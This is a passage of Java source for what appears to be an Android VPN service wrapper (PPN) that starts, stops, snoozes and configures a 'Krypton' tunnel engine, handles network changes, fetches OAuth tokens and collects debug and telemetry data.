krypton.snooze(snoozeDuration.toMillis()); } } } catch (KryptonException e) { Log.e(TAG, "Failed to snooze Ppn for specified duration.", e); throw e; } return null; }, backgroundExecutor); } @Override public ListenableFuture<Void> resume() { return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.i(TAG, "Resuming krypton connection."); krypton.resume(); } } } catch (KryptonException e) { Log.e(TAG, "Failed to resume Ppn after snooze.", e); throw e; } return null; }, backgroundExecutor); } @Override public ListenableFuture<Void> extendSnooze(Duration extendDuration) { return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.i(TAG, "Extending krypton snooze for " + extendDuration.toMillis() + " ms."); krypton.extendSnooze(extendDuration.toMillis()); } } } catch (KryptonException e) { Log.e( TAG, "Failed to extend snooze duration for " + extendDuration.toMillis() + " ms", e); throw e; } return null; }, backgroundExecutor); } /** * Stops Krypton and tells the VpnService to stop. * * @param status The status that PPN should report to the listener when it is finished stopping. */ @VisibleForTesting void stopKryptonAndService(PpnStatus status) { Log.w(TAG, "Stopping PPN: " + status); try { // We have to stop Krypton before trying to stop the Service, because as long as the VPN is // established, the Service will be bound by Android as a foreground Service, and stopSelf // will be ignored. // // However, anything other than Krypton that needs to be stopped can be handled by the // Service's onDestroy method calling onStopService(). // Log.w(TAG, "Ready to stop Krypton."); stopKrypton(); } catch (PpnException e) { Log.e(TAG, "Unable to stop krypton.", e); } finally { Log.w(TAG, "PPN stopping VpnService."); kryptonStoppedStatus = status; vpnManager.stopService(); } } @Override public ListenableFuture<Void> setSafeDisconnectEnabled(boolean enable) { // Store the value for the next time PPN is started. this.options.setSafeDisconnectEnabled(enable); // If PPN is already running, tell Krypton to update the value. return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { // Call a setter that injects feature state into Krypton. krypton.setSafeDisconnectEnabled(enable); } // If Krypton isn't running, feature state will be passed on Krypton startup through // config. } } catch (KryptonException e) { Log.e(TAG, "Unable to set Safe Disconnect in Krypton.", e); } }, backgroundExecutor); } @Override public ListenableFuture<Void> setIpGeoLevel(IpGeoLevel level) { // Store the value for the next time PPN is started. this.options.setIpGeoLevel(level); // If PPN is already running, tell Krypton to update the value. return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { // Call a setter that injects feature state into Krypton. krypton.setIpGeoLevel(level); } // If Krypton isn't running, feature state will be passed on Krypton startup through // config. } } catch (KryptonException e) { Log.e(TAG, "Unable to set IP Geo Level in Krypton.", e); } }, backgroundExecutor); } @Override public void setDisallowedApplications(Iterable<String> disallowedApplications) { HashSet<String> copy = new HashSet<>(); for (String packageName : disallowedApplications) { copy.add(packageName); } this.disallowedApplications = Collections.unmodifiableSet(copy); } @Override public void setBypassOptions(BypassOptions bypassOptions) { // Store the value for the next time PPN is started. setDisallowedApplications(bypassOptions.disallowedApplications()); vpnManager.setBypassOptions(bypassOptions); // If PPN is already running, tell Krypton to update the tunnel. try { synchronized (kryptonLock) { if (krypton != null) { // Update the tunnel to pick up the new settings krypton.forceTunnelUpdate(); } } } catch (KryptonException e) { Log.e(TAG, "Unable to force tunnel update in Krypton.", e); } } /** Returns the current Safe Disconnect state. */ @Override public boolean isSafeDisconnectEnabled() { return options.isSafeDisconnectEnabled(); } @VisibleForTesting Optional<IpGeoLevel> getIpGeoLevel() { return options.getIpGeoLevel(); } @Override public boolean isRunning() { return vpnManager.isRunning(); } /** Puts Krypton in a horrible wedged state, for testing app bypass, etc. */ @Override public ListenableFuture<Void> setSimulatedNetworkFailure(boolean simulatedNetworkFailure) { return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.i(TAG, "Setting simulated network failure to " + simulatedNetworkFailure); krypton.setSimulatedNetworkFailure(simulatedNetworkFailure); } else { Log.i( TAG, "Not setting simulated network failure to " + simulatedNetworkFailure + ", because Krypton isn't running."); } } } catch (KryptonException e) { Log.e(TAG, "Failed to set simulated network failure.", e); throw new PpnException("Failed to set simulated network failure", e); } return null; }, backgroundExecutor); } @Override public JSONObject getDebugJson() { PpnDebugJson.Builder builder = new PpnDebugJson.Builder(); builder.setServiceDebugJson(new PpnServiceDebugJson.Builder().setRunning(isRunning()).build()); synchronized (kryptonLock) { if (krypton != null) { try { builder.setKryptonDebugJson(krypton.getDebugJson()); } catch (KryptonException e) { Log.e(TAG, "Unable to get krypton debug json.", e); } } } builder.setXenonDebugJson(xenon.getDebugJson()); return builder.build(); } @Override public void setPpnListener(PpnListener listener) { this.listener = listener; } @VisibleForTesting void setTelemetryManager(PpnTelemetryManager telemetryManager) { telemetry = telemetryManager; } @Override public PpnTelemetry collectTelemetry() { logDebugInfoAsync(Duration.ofSeconds(30)); synchronized (kryptonLock) { return telemetry.collect(krypton); } } @Override public void setNotification(int notificationId, Notification notification) { notificationManager.setNotification(context, notificationId, notification); } private void startVpn() { Intent intent = new Intent(VpnService.SERVICE_INTERFACE); intent.setPackage(context.getApplicationContext().getPackageName()); context.startForegroundService(intent); } @Override public void onServiceStarted(VpnService vpnService) { onStartService(vpnService); } @Override public void onServiceStopped() { onStopService(); } /** * Handles any PPN logic that needs to occur when the Service is started, such as permanent * notification management. * * @return a Task that will be resolved once all of the async startup work is complete. */ @CanIgnoreReturnValue public Task<Void> onStartService(VpnService service) { Log.w(TAG, "PPN Service is starting."); kryptonStoppedStatus = KRYPTON_STOPPED_STATUS_UNKNOWN; vpnManager.setService(service); notificationManager.startService(service); // Look up the user account and notify the app that the PPN service has started. return accountCache .getPpnAccountAsync() .continueWithTask( backgroundExecutor, accountTask -> { Log.w(TAG, "PPN ready to start Krypton."); startKrypton(); return accountTask; }) .continueWith( TaskExecutors.MAIN_THREAD, accountTask -> { telemetry.notifyStarted(); Log.w(TAG, "PPN sending started event."); // Notify the app that PPN is started for this user. Account account = accountTask.getResult(); boolean needsNotification = !notificationManager.hasNotification(); if (listener != null) { listener.onPpnStarted(account, needsNotification); } return null; }) .continueWith( TaskExecutors.MAIN_THREAD, task -> { if (!task.isSuccessful()) { // Log the exception here, since non-test callers aren't expected to use the Task. Log.e(TAG, "Error starting PPN.", task.getException()); } return null; }); } /** * Fetches a new oauth token for Zinc, using the user who started PPN. This method should not be * called from the UI thread. * * @throws PpnException if no user is available, or the request fails for any reason. */ public String getZincOAuthToken() throws PpnException { ensureBackgroundThread(); Network network = vpnManager.getNetwork(); Account account = accountCache.getPpnAccount(); return accountManager.getOAuthToken(context, account, options.getZincOAuthScopes(), network); } /** Removes the given oauth token from the cache. */ private void clearZincOAuthToken(String token) { ensureBackgroundThread(); Log.w(TAG, "Clearing oauth token"); accountManager.clearOAuthToken(context, token); } /** * Returns whether the underlying VpnService should set the STICKY bit to be restarted by Android. */ public boolean isStickyService() { return options.isStickyService(); } /** Changes the factory used to create Krypton instances. For testing only. */ @VisibleForTesting void setKryptonFactory(KryptonFactory factory) { this.kryptonFactory = factory; } /** Returns VpnManager for testing only. */ @VisibleForTesting VpnManager getVpnManager() { return vpnManager; } /** Returns the Xenon instance being used. For testing only. */ @VisibleForTesting Xenon getXenon() { return xenon; } /** Changes the Xenon instance used. For testing only. */ @VisibleForTesting void setXenon(Xenon xenon) { this.xenon = xenon; } /** Creates a KryptonConfig with the options and feature state of this PPN instance. */ private KryptonConfig createKryptonConfig() { return this.options.createKryptonConfigBuilder().build(); } /** * Starts Krypton running. This will cause Krypton to authenticate and connect to its data plane. */ private void startKrypton() throws PpnException { ensureBackgroundThread(); vpnMonitor.start(); synchronized (kryptonLock) { if (krypton != null) { throw new PpnException("Tried to start Krypton when it was already running."); } Log.w(TAG, "PPN creating Krypton."); krypton = kryptonFactory.createKrypton(this, backgroundExecutor); try { Log.w(TAG, "PPN starting Krypton."); krypton.start(createKryptonConfig()); } catch (KryptonException e) { krypton = null; throw new PpnException("Unable to start Krypton.", e); } } Log.w(TAG, "PPN starting Xenon."); xenon.start(); Log.w(TAG, "PPN finished starting Xenon."); } /** * Stops Xenon and Krypton, if it is running. * * @throws PpnException if Krypton.stop() threw. */ private void stopKrypton() throws PpnException { Log.w(TAG, "PPN stopping Xenon."); xenon.stop(); Log.w(TAG, "PPN stopped Xenon."); vpnMonitor.stop(); synchronized (kryptonLock) { if (krypton == null) { return; } try { Log.w(TAG, "PPN stopping Krypton."); krypton.stop(); Log.w(TAG, "Krypton stop returned."); } catch (KryptonException e) { throw new PpnException("Unable to stop Krypton.", e); } finally { krypton = null; } } } /** * Logs PPN debug info to logcat in the background. * * @return the JSONObject that was logged. */ @ResultIgnorabilityUnspecified @VisibleForTesting Task<JSONObject> logDebugInfoAsync(Duration timeout) { // A task that will be resolved either when the debug info has been printed, or after timeout. TaskCompletionSource<JSONObject> tcs = new TaskCompletionSource<>(); AtomicBoolean finished = new AtomicBoolean(false); // Set up a timeout to log if getDebugJson doesn't appear to be responding. Runnable timeoutRunner = () -> { if (finished.compareAndSet(false, true)) { Log.i(TAG, "PPN appears to be deadlocked while fetching debug info."); tcs.trySetException(new TimeoutException("Call to getDebugJson timed out.")); } }; mainHandler.postDelayed(timeoutRunner, timeout.toMillis()); // Get the debug info from the background thread. backgroundExecutor.execute( () -> { JSONObject debug = getDebugJson(); if (finished.compareAndSet(false, true)) { mainHandler.removeCallbacks(timeoutRunner); Log.i(TAG, "PPN debug info: " + debug); tcs.setResult(debug); } }); return tcs.getTask(); } public void onStopService() { Log.w(TAG, "PPN Service has stopped."); // Grab the status reported from Krypton when it stopped, before resetting everything. PpnStatus status = kryptonStoppedStatus; kryptonStoppedStatus = KRYPTON_STOPPED_STATUS_UNKNOWN; vpnManager.setService(null); notificationManager.stopService(); // Krypton should already be stopped, but if it's not, try to stop it. try { stopKrypton(); } catch (PpnException e) { Log.e(TAG, "Unable to stop Krypton.", e); } // Report to the listener why PPN was stopped. telemetry.notifyStopped(); if (listener != null) { listener.onPpnStopped(status); } } private NetworkInfo createNetworkInfo(PpnNetwork ppnNetwork) { NetworkInfo.Builder builder = NetworkInfo.newBuilder() .setNetworkType(ppnNetwork.getNetworkType()) .setNetworkId(ppnNetwork.getNetworkId()) .setAddressFamily(ppnNetwork.getAddressFamily()); if (options.isDynamicMtuEnabled()) { if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) { ConnectivityManager manager = context.getSystemService(ConnectivityManager.class); LinkProperties linkProperties = manager.getLinkProperties(ppnNetwork.getNetwork()); int mtu = linkProperties.getMtu(); if (mtu != 0) { builder.setMtu(mtu); } } } return builder.build(); } @Override public void onNetworkAvailable(PpnNetwork ppnNetwork) { Log.w(TAG, "PPN received network available."); telemetry.notifyNetworkAvailable(); backgroundExecutor.execute( () -> { try { synchronized (kryptonLock) { if (krypton != null) { NetworkInfo networkInfo = createNetworkInfo(ppnNetwork); Log.w(TAG, "Setting network on Krypton."); try { krypton.setNetwork(networkInfo); } finally { vpnManager.setNetwork(ppnNetwork); } } } } catch (KryptonException e) { Log.e(TAG, "Unable to switch networks.", e); } }); } @Override public void onNetworkUnavailable(NetworkUnavailableReason reason) { Log.w(TAG, "PPN received network unavailable."); telemetry.notifyNetworkUnavailable(); backgroundExecutor.execute( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.w(TAG, "Setting Krypton network unavailable."); krypton.setNoNetworkAvailable(); } } } catch (KryptonException e) { Log.e(TAG, "Unable to set no network.", e); } }); } private static void ensureBackgroundThread() { if (Looper.getMainLooper().isCurrentThread()) { throw new IllegalStateException("Must not be called on the main thread."); } } }